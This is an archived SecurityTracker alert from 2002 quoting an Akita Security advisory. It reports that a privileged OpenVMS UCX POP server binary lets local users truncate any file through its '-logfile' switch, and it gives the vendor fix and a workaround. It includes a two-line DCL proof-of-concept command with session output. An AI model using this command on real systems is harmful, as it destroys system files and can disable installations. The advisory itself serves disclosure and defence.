Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
Become a Partner and License Our Database or Notification Service
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Compaq OpenVMS UCX POP Mail Server Lets Local Users Overwrite Arbitrary Files
|
|
SecurityTracker Alert ID: 1005294 |
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Sep 26 2002
|
Impact: Denial of service via local system, Modification of system information
|
Fix Available: Yes
Exploit Included: Yes
Vendor Confirmed: Yes
|
Description: A vulnerability was reported in the OpenVMS UCX POP mail server. A local user can erase the contents of arbitrary files on the system.
Akita Security issued an advisory warning that a local user can overwrite arbitrary files with a 0 byte file.
According to the
report, the UCX pop server binary (SYS$SYSTEM:UCX$POP_SERVER.EXE) is installed with the VMS privileges BYPASS and SYSPRV. The BYPASS
privilege apparently allows the POP server to override filesystem permissions. A local user can exploit the '-logfile' command
line switch to cause the POP server to open an arbitrary file for writing, thereby truncating the existing file.
A demonstration
exploit is provided:
$ break_it :== $sys$system:ucx$pop_server.exe
$ break_it -logfile sys$system:I_SHOULDNT_BE_ABLE_TO_WRITE_HERE
|
Impact: A local user can overwrite arbitrary files with 0 bytes to create denial of service conditions.
|
Solution: Compaq has issued an ECO: ECO B 1-JUL-2002 Alpha and VAX
Disable the "-logfile" command line switch, which is not needed on OpenVMS.
Deliverables:
TCPIP$POP_SERVER.EXE V5.3-18B
|
Vendor URL: www.compaq.com/ (Links to External Site)
|
Cause: Access control error
|
Underlying OS: OpenVMS
|
Reported By: "Mike Riley" <mike@akitanet.co.uk>
|
Message History:
None.
|
Source Message Contents
|
Date: Fri, 27 Sep 2002 13:26:10 +0100
From: "Mike Riley" <mike@akitanet.co.uk>
Subject: OpenVMS POP server local vulnerability
|
Akita Security Advisory 27/09/2002
OpenVMS UCX$POP_SERVER.EXE vulnerability
Advisory:
http://www.akita-security.co.uk/VMS/ucx_pop_server.txt
VMS security tool
http://www.akita-security.co.uk/stoat
Overview
========
UCX is the main TCP/IP stack for OpenVMS. Akita Security have
discovered a vulnerability in every version of the UCX pop
server which allows a local user to overwrite any file on the
system with a 0 byte file.
Due to the popularity of UCX this problem will be widespread
amongst OpenVMS installations.
This issue was discovered as part of wider research into OpenVMS
security. Many issues have been found, and further advisories
will be released shortly.
Detail
======
The UCX pop server binary, SYS$SYSTEM:UCX$POP_SERVER.EXE, is
installed with the VMS privileges BYPASS and SYSPRV:
INSTALL> list ucx$pop_server.exe /full
DISK$OPENVMS071:<SYS0.SYSCOMMON.SYSEXE>.EXE
UCX$POP_SERVER;1 Prv
Entry access count = 1
Privileges = SYSPRV BYPASS
INSTALL>
The BYPASS privilege allows the pop server to override filesystem
permissions. By use of the -logfile commandline switch, it is
possible to persuade the server to open a file anywhere, or to
truncate an existing file, as follows:
____________________________________________________________________
$ show process/privs
25-SEP-2002 10:47:35.02 User: MIKE Process ID:
0000013F
Node: VAX Process name:
"_TNA21:_1"
Authorized privileges:
NETMBX TMPMBX
Process privileges:
NETMBX may create network device
TMPMBX may create temporary mailbox
Process rights:
INTERACTIVE
REMOTE
System rights:
SYS$NODE_VAX
$ break_it :== $sys$system:ucx$pop_server.exe
$ break_it -logfile sys$system:I_SHOULDNT_BE_ABLE_TO_WRITE_HERE
19102-09-24 17:41:39 sizeof(block_wait_times) 160
19102-09-24 17:41:40 sizeof(struct vms_time_rec) 32
19102-09-24 17:41:40 num_elems 5
[SNIP]
^C
$ dir/prot sys$system:I_*
Directory SYS$SYSROOT:[SYSEXE]
I_SHOULDNT_BE_ABLE_TO_WRITE_HERE.;1
insufficient privilege or object protection
violation
Total of 1 file.
____________________________________________________________________
The file created looks like this:
____________________________________________________________________
Directory SYS$SYSROOT:[SYSEXE]
I_SHOULDNT_BE_ABLE_TO_WRITE_HERE.;1 File ID: (9499,485,0)
Size: 0/0 Owner: [SYSTEM]
Created: 24-SEP-2002 17:41:41.14
Revised: 24-SEP-2002 17:41:57.09 (1)
Expires: <None specified>
Backup: <No backup recorded>
Effective: <None specified>
Recording: <None specified>
File organization: Sequential
Shelved state: Online
File attributes: Allocation: 0, Extend: 0, Global buffer count: 0
No version limit
Record format: Stream_LF, maximum 0 bytes, longest 32767 bytes
Record attributes: Carriage return carriage control
RMS attributes: None
Journaling enabled: None
File protection: System:RWED, Owner:RWED, Group:RE, World:
Access Cntrl List: None
Total of 1 file, 0/0 blocks.
____________________________________________________________________
Severity
========
At the least, this bug could be used by a local user to destroy an
OpenVMS installation, or overwrite logfiles. If a local user could
control the log output of the pop server it could probably be used
to gain full privileges, although this is speculation on our part.
Workaround
==========
Remove world execute permissions for the pop server binary.
Vendor status
=============
Akita Security informed Compaq of this vulnerability on 14/06/2002.
Compaq have released an ECO which corrects the problem:
____________________________________________________________________
ECO B 1-JUL-2002 Alpha and VAX
Problem:
Disable the "-logfile" command line switch, which is not needed on
OpenVMS.
Deliverables:
TCPIP$POP_SERVER.EXE V5.3-18B
Reference:
Internal testing.
____________________________________________________________________
Please note the lack of reference to a security problem, and the
lack of credit to Akita Security. Internal testing ?
Credit
======
This issue was discovered by mike@akita.co.uk
--
Mike Riley - Security Systems manager @ Akita
http://www.akita-security.co.uk
--------------------------------------------------------------------
Sales: T:+44(0)1869 320111 F: +44(0)1869250688 E: sales@akita.co.uk
Tech: T: +44(0)1869 320111 E: mike@akita.co.uk
--------------------------------------------------------------------
"Security, performance, cost - pick two"
|
|
Go to the Top of This SecurityTracker Archive Page
|
